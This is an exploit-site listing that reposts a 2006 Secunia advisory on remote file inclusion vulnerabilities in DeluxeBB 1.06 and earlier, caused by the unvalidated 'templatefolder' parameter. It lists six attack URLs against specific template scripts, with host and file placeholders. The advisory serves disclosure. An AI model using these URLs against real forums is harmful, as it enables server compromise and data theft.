[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities

Author
Andreas Sandblad
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-519
Category
web applications
Date add
14-06-2006
Platform
unsorted
=====================================================================
DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities
=====================================================================




Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified, before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]



#  0day.today [2024-12-25]  #